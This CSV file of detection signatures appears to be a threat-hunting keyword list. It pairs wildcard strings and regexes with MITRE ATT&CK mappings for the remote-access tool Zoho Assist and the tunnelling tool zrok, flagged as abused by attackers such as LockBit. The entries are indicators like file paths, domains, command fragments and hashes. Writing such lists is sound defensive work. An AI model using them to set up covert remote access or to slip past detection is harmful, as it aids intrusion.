"*\ZohoMeeting\agent.exe*",".{0,1000}\\ZohoMeeting\\agent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\zohomeeting\agent.exe*",".{0,1000}\\zohomeeting\\agent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting\agent_ui.exe*",".{0,1000}\\ZohoMeeting\\agent_ui\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting\Connect.exe*",".{0,1000}\\ZohoMeeting\\Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting\Connection.conf*",".{0,1000}\\ZohoMeeting\\Connection\.conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting\log\*.log*",".{0,1000}\\ZohoMeeting\\log\\.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting\ViewerUI.exe*",".{0,1000}\\ZohoMeeting\\ViewerUI\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoTray.exe*",".{0,1000}\\ZohoTray\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoURS.exe*",".{0,1000}\\ZohoURS\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoURSService.exe*",".{0,1000}\\ZohoURSService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*_Classes\zohoassistlaunchv2*",".{0,1000}_Classes\\zohoassistlaunchv2.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*assist.zoho.com*",".{0,1000}assist\.zoho\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*downloads.zohocdn.com*",".{0,1000}downloads\.zohocdn\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*downloads.zohodl.com.cn*",".{0,1000}downloads\.zohodl\.com\.cn.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*gateway.zohoassist.com*",".{0,1000}gateway\.zohoassist\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.zoho.com/pconnect*",".{0,1000}https\:\/\/.{0,1000}\.zoho\.com\/pconnect.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.zohoassist.com/w_socket*",".{0,1000}https\:\/\/.{0,1000}\.zohoassist\.com\/w_socket.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/assist-join?key=*",".{0,1000}https\:\/\/assist\.zoho\.com\/assist\-join\?key\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/customer-session-details?client_token=*",".{0,1000}https\:\/\/assist\.zoho\.com\/customer\-session\-details\?client_token\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/join?join_source=EMAIL_INVITE*",".{0,1000}https\:\/\/assist\.zoho\.com\/join\?join_source\=EMAIL_INVITE.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/join-session?key=*",".{0,1000}https\:\/\/assist\.zoho\.com\/join\-session\?key\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/org/*",".{0,1000}https\:\/\/assist\.zoho\.com\/org\/.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://assist.zoho.com/viewer-assist*",".{0,1000}https\:\/\/assist\.zoho\.com\/viewer\-assist.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://pubsub.zoho.com/*_deskUserPresence/pubsub*",".{0,1000}https\:\/\/pubsub\.zoho\.com\/.{0,1000}_deskUserPresence\/pubsub.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://us4-wms6.zoho.com*",".{0,1000}https\:\/\/us4\-wms6\.zoho\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProductName:Zoho%%20Assist* apptype:ATTENDEE*",".{0,1000}ProductName\:Zoho\%\%20Assist.{0,1000}\sapptype\:ATTENDEE.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*program files (x86)\zohomeeting*",".{0,1000}program\sfiles\s\(x86\)\\zohomeeting.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'ServiceName'>Zoho Assist-Remote Support*",".{0,1000}\'ServiceName\'\>Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*turn-*.zohomeeting.com*",".{0,1000}turn\-.{0,1000}\.zohomeeting\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZA_Connect.exe *",".{0,1000}ZA_Connect\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZA_Connect.exe.ApplicationCompany*",".{0,1000}ZA_Connect\.exe\.ApplicationCompany.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZAFileTransfer.exe *",".{0,1000}ZAFileTransfer\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZAService.exe *",".{0,1000}ZAService\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZOHO CORPORATION PRIVATE LIMITED*",".{0,1000}ZOHO\sCORPORATION\sPRIVATE\sLIMITED.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZohoMeeting.exe*",".{0,1000}ZohoMeeting\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZohoMeeting\FileTransferSettings.conf*",".{0,1000}ZohoMeeting\\FileTransferSettings\.conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ZohoMeeting\Service.Conf*",".{0,1000}ZohoMeeting\\Service\.Conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* admin create frontend sqJRAINSiB public *",".{0,1000}\sadmin\screate\sfrontend\ssqJRAINSiB\spublic\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"* -c rest_client_zrok -t*",".{0,1000}\s\-c\srest_client_zrok\s\-t.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"* -s rest_server_zrok -t*",".{0,1000}\s\-s\srest_server_zrok\s\-t.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"* zrok.listener*",".{0,1000}\szrok\.listener.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*$HOME/.zrok*",".{0,1000}\$HOME\/\.zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*.in.zrok.io*",".{0,1000}\.in\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*.share.zrok.io*",".{0,1000}\.share\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*.zrok.quigley.com*",".{0,1000}\.zrok\.quigley\.com.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/.zrok/*.json*",".{0,1000}\/\.zrok\/.{0,1000}\.json.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/.zrok:/.zrok*",".{0,1000}\/\.zrok\:\/\.zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*// NewHTTPClient creates a new zrok HTTP client.*",".{0,1000}\/\/\sNewHTTPClient\screates\sa\snew\szrok\sHTTP\sclient\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/docker/compose/zrok-instance/*",".{0,1000}\/docker\/compose\/zrok\-instance\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/etc/zrok.env*",".{0,1000}\/etc\/zrok\.env.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/etc/zrok/*",".{0,1000}\/etc\/zrok\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/rest_client_zrok/*",".{0,1000}\/rest_client_zrok\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/var/lib/zrok-*",".{0,1000}\/var\/lib\/zrok\-.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok.exe*",".{0,1000}\/zrok\.exe.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok.git*",".{0,1000}\/zrok\.git.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok.zip*",".{0,1000}\/zrok\.zip.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-amd64_darwin_amd64*",".{0,1000}\/zrok\-amd64_darwin_amd64.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-arm64_darwin_arm64*",".{0,1000}\/zrok\-arm64_darwin_arm64.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-controller.log*",".{0,1000}\/zrok\-controller\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-docker/*",".{0,1000}\/zrok\-docker\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-frontend.log*",".{0,1000}\/zrok\-frontend\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*/zrok-share.env*",".{0,1000}\/zrok\-share\.env.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*\zrok.exe*",".{0,1000}\\zrok\.exe.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*\zrok.zip*",".{0,1000}\\zrok\.zip.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*\zrok-controller.log*",".{0,1000}\\zrok\-controller\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*\zrok-frontend.log*",".{0,1000}\\zrok\-frontend\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*>Welcome new zrok user!<*",".{0,1000}\>Welcome\snew\szrok\suser!\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*>Welcome to zrok!<*",".{0,1000}\>Welcome\sto\szrok!\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*>zrok frontend health: ok<*",".{0,1000}\>zrok\sfrontend\shealth\:\sok\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*>zrok test endpoint<*",".{0,1000}\>zrok\stest\sendpoint\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*25e850edd1cb8707c9a18a0fcc610b831cce25203dff650ec7e781175d900df3*",".{0,1000}25e850edd1cb8707c9a18a0fcc610b831cce25203dff650ec7e781175d900df3.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
"*4adeaf8287ac71363bb2c5ccd6b67b8c973f783702c18c444741875375772be1*",".{0,1000}4adeaf8287ac71363bb2c5ccd6b67b8c973f783702c18c444741875375772be1.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"
